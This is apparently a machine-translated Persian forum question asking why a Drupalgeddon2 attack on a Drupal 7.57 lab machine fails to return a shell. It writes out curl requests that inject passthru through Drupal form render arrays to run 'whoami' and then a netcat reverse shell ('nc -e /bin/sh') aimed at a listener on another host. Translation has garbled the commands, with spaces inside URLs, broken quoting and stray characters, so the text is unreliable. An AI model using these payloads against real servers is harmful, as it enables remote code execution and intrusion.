من در حال تلاش برای استفاده از بهره برداری Drupalgeddon2 (https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708) در ماشین دروپال 7.57 اوبونتو هستم.

-sur : //192.168.204.141/؟ q = user / password & name [%23post_render][] = passthru & name [%23type] = markup & name [%23markup] = whoami ' –data "form_id = user_pass & _triggering_element_name = name & _triggering_element_value = & name grep form_build_id.

-curl -k -i "http://192.168.204.141/؟q=file/ajax/name/٪23value/${form_build_id}" –data "form_build_id = $ {form_build_id}".

همراه با هر فرمان دیگر (ls ، cd …) اجرا کنید و نتیجه را چاپ کنید.

اما وقتی درخواست curl را میفرستم:

 curl -k -s 'http://192.168.204.141/ ؟ q = user / password & name [%23post_render][] = passthru & name [%23type] = markup & name [%23markup] = nc-e / bin / sh 192.168.204.128 5555 '- data "form_id = user_pass & _triggering_element_name = name & _triggering_element_name = name & _triggering_element_value | grep form_build_id.

این حتی هیچ خطایی را چاپ نمی کند (form_build_id) ، و هدف به کنترل کننده وصل نمی شود. به نظر شما مشکل کجاست؟

من بارهای دیگر را امتحان کردم ، و آنها به همان موارد منجر می شوند.